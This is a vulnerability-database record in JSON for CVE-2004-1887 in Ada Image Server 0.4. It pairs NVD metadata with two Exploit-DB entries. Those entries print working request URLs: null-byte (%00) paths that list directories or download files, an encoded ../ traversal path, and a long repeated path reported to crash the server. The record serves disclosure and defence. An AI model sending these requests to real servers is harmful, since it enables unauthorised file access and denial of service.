{"id": "CVE-2004-1887", "bulletinFamily": "NVD", "title": "CVE-2004-1887", "description": "Ada Image Server (ImgSvr) 0.4 allows remote attackers to view directories or download files via an HTTP request with a trailing %00 (null).", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1887", "reporter": "cve@mitre.org", "references": ["http://sourceforge.net/project/shownotes.php?release_id=230023", "http://marc.info/?l=bugtraq&m=108083813528255&w=2", "http://secunia.com/advisories/11277", "https://exchange.xforce.ibmcloud.com/vulnerabilities/15706", "http://www.securityfocus.com/bid/10027", "http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt", "http://www.securityfocus.com/bid/10026"], "cvelist": ["CVE-2004-1887"], "type": "cve", "lastseen": "2021-02-02T05:23:00", "edition": 4, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:23905", "EDB-ID:23906"]}], "modified": "2021-02-02T05:23:00", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-02-02T05:23:00", "rev": 2}, "vulnersScore": 5.3}, "cpe": ["cpe:/a:ada:imgsvr:0.4"], "affectedSoftware": [{"cpeName": "ada:imgsvr", "name": "ada imgsvr", "operator": "eq", "version": "0.4"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:ada:imgsvr:0.4:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ada:imgsvr:0.4:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "10027", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/10027"}, {"name": "http://sourceforge.net/project/shownotes.php?release_id=230023", "refsource": "CONFIRM", "tags": [], "url": "http://sourceforge.net/project/shownotes.php?release_id=230023"}, {"name": "http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt"}, {"name": "imgsvr-obtain-information(15706)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/15706"}, {"name": "20040401 Index viewing in imgSvr 0.4", "refsource": "BUGTRAQ", "tags": [], "url": "http://marc.info/?l=bugtraq&m=108083813528255&w=2"}, {"name": "11277", "refsource": "SECUNIA", "tags": ["Patch", "Exploit"], "url": "http://secunia.com/advisories/11277"}, {"name": "10026", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/10026"}]}

{"exploitdb": [{"lastseen": "2016-02-02T22:04:27", "description": "ADA IMGSVR 0.4 Remote Directory Listing Vulnerability. CVE-2004-1887 . Remote exploit for windows platform", "published": "2004-04-01T00:00:00", "type": "exploitdb", "title": "ADA IMGSVR 0.4 - Remote Directory Listing Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1887"], "modified": "2004-04-01T00:00:00", "id": "EDB-ID:23905", "href": "https://www.exploit-db.com/exploits/23905/", "sourceData": "source: http://www.securityfocus.com/bid/10026/info\r\n\r\nA vulnerability has been reported in the ImgSvr server software that may allow a remote user to the disclose root directory listings. This issue has also been reported to allow for listing of directories that reside outside the server root as well.\r\n\r\nAn attacker may leverage this issue to gain access to sensitive information by disclosing directory listings; information disclosed in this way could lead to further attacks against the target system. \r\n\r\nFor listing directories inside the server root (provided by Donato Ferrante):\r\nhttp://www.example.org:1234/%00/\r\nhttp://www.example.org:1234/someDirectory%00/\r\nhttp://www.example.org:1234/someDirectory/%00/\r\n\r\nFor listing directories outside of the server root (provided by Dr_insane):\r\nhttp://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/23905/"}, {"lastseen": "2016-02-02T22:04:35", "description": "ADA IMGSVR 0.4 Remote File Download Vulnerability. CVE-2004-1887. Remote exploit for windows platform", "published": "2004-04-01T00:00:00", "type": "exploitdb", "title": "ADA IMGSVR 0.4 - Remote File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1887"], "modified": "2004-04-01T00:00:00", "id": "EDB-ID:23906", "href": "https://www.exploit-db.com/exploits/23906/", "sourceData": "source: http://www.securityfocus.com/bid/10027/info\r\n\r\nA vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.\r\n\r\nAn attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. \r\n\r\nhttp://www.example.org:1234/someDirectory/fileName%00\r\n\r\nThe following has been reported to crash the affected server:\r\nhttp://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/ ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/23906/"}]}